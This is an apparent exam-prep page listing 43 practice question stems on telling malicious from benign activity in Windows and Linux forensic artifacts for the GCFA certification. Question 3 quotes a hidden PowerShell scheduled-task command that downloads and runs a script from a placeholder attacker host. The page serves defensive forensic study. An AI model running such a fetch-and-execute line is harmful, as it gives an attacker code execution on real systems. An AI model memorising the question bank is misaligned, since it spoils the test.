Courseiva

GCFA · domain

Identification of Malicious and Normal Activity

This domain tests your ability to distinguish malicious from benign activity using Windows artifacts: Security event logs, Sysmon, memory, and file system metadata. Questions present scenarios like credential dumping, logon anomalies, or botnet triage and ask which artifacts or event IDs confirm the activity. You must know event IDs, logon types, and tool outputs.

43 questions10 easy19 medium14 hard

Focused practice

Practice Identification of Malicious and Normal Activity questions

Scored sessions drawing only from this domain — pick a length below.

Start 20-question practice test →

What this domain covers

What to know about Identification of Malicious and Normal Activity

You must correlate Windows event logs, Sysmon, and memory artifacts to identify malicious activity like credential dumping or anomalous logons. The single most important thing is to verify the context of event IDs and logon types before concluding malice.

Windows Security event IDs: 4624, 4625, 4672, 4688, and logon types 3, 10

Sysmon event IDs for process creation, network connections, and image loads

Memory analysis artifacts for credential dumping: LSASS access, SAM, and cached credentials

Windows file system metadata: $MFT, $UsnJrnl, prefetch, and shimcache for execution evidence

Watch out for

Common Identification of Malicious and Normal Activity exam traps

  • ▸Assuming Event ID 4624 with Logon Type 3 always indicates malicious lateral movement, ignoring legitimate service or scheduled task logons.
  • ▸Confusing Event ID 4672 (special privileges assigned) as proof of compromise, when it also occurs for legitimate admin logons.
  • ▸Overlooking that Sysmon must be installed and configured; default Windows logs do not capture process creation or network connections.

Question index

All Identification of Malicious and Normal Activity questions (43)

Click any question to see the full explanation, or start a practice session above.

1

An analyst reviewing a Windows workstation finds that the file C:\Windows\System32\drivers\etc\hosts has been modified and now contains several entries mapping well-known banking domains to 127.0.0.1. The file's LastWriteTime is two days ago, and no administrator has reported making the change. Which conclusion is MOST appropriate?

Easy
2

While reviewing a Windows host, you find a 4688 process creation event where the new process is C:\Windows\System32\svchost.exe but the parent process image is C:\Users\bob\AppData\Local\Temp\update.exe. The command line for svchost.exe contains -k netsvcs with no additional arguments. Which assessment is best supported?

Medium
3

A security analyst is examining a Windows 10 system and finds a scheduled task named 'Updater' that runs 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"' every hour. The task is configured to run under the SYSTEM account. Which of the following best describes the malicious technique being used?

Easy
4

During an investigation of a compromised Windows 10 workstation, a forensic analyst reviews the NTFS $MFT and observes that the Standard Information Attribute (SIA) timestamps for a suspicious executable in C:\Windows\Temp are all identical, while the File Name Attribute (FNA) timestamps show a different, earlier date. The executable has no corresponding Prefetch file. Which conclusion is most strongly supported by these artifacts?

Medium
5

During an investigation of a Windows Server 2019 host, you review the Security event log and find Event ID 4624 entries with Logon Type 3 originating from a workstation subnet that should never authenticate to this server. The associated 4672 entry shows SeDebugPrivilege assigned to the resulting token. The account name is a normal helpdesk user. Which conclusion is most defensible from these artifacts alone?

Medium
6

When reviewing firewall logs, what activity should be flagged as an immediate indicator of a potential port scan?

Easy
7

During an intrusion investigation on a Windows 10 workstation, an analyst observes that several user-mode processes have established TCP connections to 203.0.113.45:443. The analyst wants to determine which executable image on disk was responsible for the network activity and whether the process is still running. Which artifact provides the most direct evidence by mapping a live network connection to its owning process executable path?

Medium
8

Which TWO of the following behaviors are common indicators of fileless malware execution that a forensic analyst should look for in memory artifacts?

Medium
9

A forensic analyst is analyzing a Windows 10 memory image and finds a process named 'svchost.exe' with PID 4567. The process's parent is 'services.exe', but its executable path is C:\Users\Public\svchost.exe. The analyst also notices that the process has a network connection to an external IP on port 443. Which of the following is the most likely explanation for this finding?

Hard
10

During a live response on a Windows 10 workstation, you observe a process named 'lsass.exe' with PID 672. Its parent process is 'winlogon.exe' (PID 596), and its executable path is 'C:\Windows\System32\lsass.exe'. However, the process has an open handle to a suspicious named pipe '\\.\pipe\evil'. Based on this evidence, what is the most likely explanation?

Medium
11

A forensic analyst is reviewing a compromised Windows 10 host and finds a file named 'lsass.exe' in the C:\Windows\Temp directory. The file has a creation timestamp that coincides with the suspected intrusion time. The analyst wants to determine if this file is a malicious copy of the legitimate Windows process. Which characteristic of the legitimate lsass.exe should the analyst verify first to confirm the file is suspicious?

Easy
12

You are examining a Windows 10 host and find a scheduled task whose XML action launches 'rundll32.exe' with the argument 'C:\ProgramData\Microsoft\Crypto\RSA\logon.dll,Register'. The task's author is a domain user who has never logged on to this machine, and the DLL has a creation timestamp matching the suspected intrusion window. Which assessment is best supported?

Hard
13

Which indicator is most effective for identifying a 'Golden Ticket' attack during Kerberos-based authentication?

Medium
14

An analyst is examining a Linux server that is suspected of being compromised. The analyst runs 'netstat -anp' and observes a process named 'kworker' with PID 1234 listening on TCP port 4444. The analyst knows that legitimate kworker processes are kernel threads and do not open network sockets. Which of the following conclusions is most appropriate?

Medium
15

An analyst is examining a Linux server suspected of compromise. In /var/log/auth.log, they observe repeated entries of the form: 'sshd[1234]: Accepted publickey for deploy from 10.20.30.40 port 51515 ssh2: RSA SHA256:...' followed by 'sshd[1234]: pam_unix(sshd:session): session opened for user deploy'. No corresponding 'Failed password' entries appear for that source IP. Which interpretation is MOST accurate?

Medium
16

An analyst observes PowerShell usage with the encoded command flag '-e'. What is the standard forensic approach to de-obfuscate and analyze this activity?

Medium
17

While triaging a Linux web server, you find that '/usr/bin/sshd' was executed but the running process's parent is 'bash' rather than the systemd service manager, and the process has no associated listening socket. Which conclusion is best supported?

Easy
18

Which forensic artifact is most useful for determining if a user has recently opened a specific suspicious file, even if that file has since been deleted?

Medium
19

Which THREE of the following are considered 'living-off-the-land' (LotL) techniques used by attackers to avoid detection?

Hard
20

A forensic analyst is investigating a Windows workstation that is suspected of being compromised by a fileless malware attack. The analyst has acquired a memory image and a disk image. Which TWO of the following artifacts, when analyzed together, would provide the strongest evidence that a fileless attack has occurred and is currently active? (Choose two.)

Hard
21

An analyst reviewing Windows event logs on a compromised workstation discovers a sudden spike in Event ID 4624 with Logon Type 3, followed immediately by Event ID 4672. The source IP address belongs to a non-routable internal subnet. Which forensic interpretation best explains this activity?

Medium
22

During a compromise assessment on a Windows 10 workstation, an analyst runs a volatile memory capture and inspects the process list in Volatility 3. The analyst observes a process named 'lsass.exe' with PID 872, whose parent process is 'winlogon.exe' with PID 640. The executable path recorded for lsass.exe is 'C:\Windows\System32\lsass.exe'. Which conclusion is BEST supported by these artifacts?

Medium
23

You are reviewing a Windows Server 2019 Security event log and find Event ID 4624 with Logon Type 3 and the 'NTLM' authentication package for a service account, occurring at 02:14 from a workstation that has no corresponding 4648 or 4672 events. Which interpretation is most forensically sound?

Hard
24

A forensic analyst is examining a Windows Server 2016 system that is suspected of being compromised. The analyst runs 'wevtutil qe Security /f:text /q:"*[System[(EventID=4688)]]"' and notices that many process creation events have the 'Subject Logon ID' field set to '0x3e7'. Which of the following best describes the significance of this finding?

Hard
25

An analyst identifies a process performing unexpected DNS queries to a top-level domain ending in .xyz every 60 seconds. What is the most effective initial host-based action to confirm malicious beaconing?

Medium
26

Refer to the exhibit. An analyst observes this process execution on a domain controller. What indicator suggests this activity is likely malicious?

Hard
27

You are analyzing a Linux web server and find that /var/log/auth.log contains many 'Failed password' entries followed by a single 'Accepted password' for the account 'deploy' from the same source IP. Shortly after, you see a sudo command adding a new user named 'support' to the sudoers file. Which sequence best describes what occurred?

Hard
28

Which log category should an analyst examine to identify a potential 'Pass-the-Hash' attack?

Medium
29

An analyst is reviewing a Windows Server 2019 host and finds that a scheduled task named 'MicrosoftEdgeUpdateTaskMachineUA' exists under Task Scheduler Library\Microsoft\EdgeUpdate. The task's action launches 'C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe' with the argument '/ua', and the task's XML shows it was created by 'NT AUTHORITY\SYSTEM'. The XML file in C:\Windows\System32\Tasks was last modified three months ago, matching the install date of Edge. Which assessment is MOST accurate?

Hard
30

Refer to the exhibit. What is the most critical security concern presented by the second command line?

Hard
31

An analyst observes a high volume of '4625' events for a single user account. What does this indicate and what is the appropriate initial response?

Easy
32

When reviewing Windows Event Logs, which event ID indicates that a user has successfully performed an interactive login, and why is this critical for identifying unauthorized lateral movement?

Medium
33

An analyst is investigating a suspected credential dumping incident on a Windows Server 2016 domain controller. The analyst has acquired a memory image and the Windows event logs. Which TWO of the following artifacts would provide the most direct evidence that LSASS memory was accessed for credential theft? (Choose two.)

Hard
34

An analyst is reviewing a memory dump from a Windows 10 system using Volatility 3. The analyst runs 'vol.py -f memory.dmp windows.netscan' and observes a TCP connection with a state of 'ESTABLISHED' between the local IP 10.0.0.5:49152 and a remote IP 203.0.113.45:443. The process associated with this connection is 'chrome.exe' (PID 1234). Which of the following should the analyst do next to determine if this connection is malicious?

Medium
35

Which log artifact provides the most reliable evidence that a user account was used for an interactive remote login rather than a scheduled task?

Medium
36

An analyst is reconstructing a suspected credential-dumping incident on a Windows 10 host and has already imaged memory. Which TWO artifacts should the analyst examine to determine whether the LSASS process memory was accessed by an unauthorized tool? (Choose two.)

Medium
37

A forensic analyst is reviewing Windows Security event logs to identify potential malicious activity. The analyst notices a series of Event ID 4625 (An account failed to log on) followed by Event ID 4624 (An account was successfully logged on) for the same user account within a short period. What is the most likely explanation for this pattern?

Easy
38

A forensic analyst is triaging a Windows 10 endpoint that is suspected of being part of a botnet. The analyst has collected the Security, System, and Application event logs, the Sysmon operational log, and a live memory image. Which TWO of the following artifacts would provide the most direct evidence of periodic command-and-control beaconing behavior? (Choose two.)

Hard
39

You are analyzing a system and find evidence that a user has executed a PowerShell script that imports the 'Net.WebClient' class. What is the most likely purpose of this script?

Hard
40

What is the primary forensic value of examining MFT (Master File Table) $Standard_Information vs $File_Name attributes?

Hard
41

A forensic analyst is reviewing a Windows 10 system and finds that a scheduled task named 'Updater' was created to run a PowerShell script every hour. The task's action is powershell.exe -WindowStyle Hidden -EncodedCommand <base64>. The task was created by a user account that normally does not perform administrative tasks. Which of the following best describes the forensic significance of this finding?

Easy
42

An analyst is triaging a Linux server and finds a process whose /proc/<pid>/exe symlink points to /tmp/.kwork, and whose parent process is the legitimate cron daemon. The file is owned by root but has no package ownership record. Which interpretation is most appropriate?

Easy
43

A forensic analyst is reviewing a Windows 10 system suspected of being infected with malware that maintains persistence. The analyst notices a new service named 'Windows Update Helper' with a binary path pointing to C:\Users\Public\updater.exe. The service is set to start automatically. Which artifact would best confirm that this service was created recently and is not a legitimate Windows service?

Easy

Frequently asked questions

What does the Identification of Malicious and Normal Activity domain cover on the GCFA exam?
You must correlate Windows event logs, Sysmon, and memory artifacts to identify malicious activity like credential dumping or anomalous logons. The single most important thing is to verify the context of event IDs and logon types before concluding malice.
How many questions are in this domain?
This page lists all 43 Identification of Malicious and Normal Activity questions in the GCFA question bank. The actual exam draws from this domain proportionally to its weighting in the official exam blueprint.
What is the best way to practise this domain?
Start with a short focused session (10 questions) to identify gaps, then work through explanations. Repeat with a longer session once the weak areas feel solid.
Can I practise only Identification of Malicious and Normal Activity questions?
Yes — the session launcher on this page filters questions to this domain only. Choose any session length for inline explanations and scoring.
giac-gcfa GIAC-GCFA identification of malicious and normal activity Practice Questions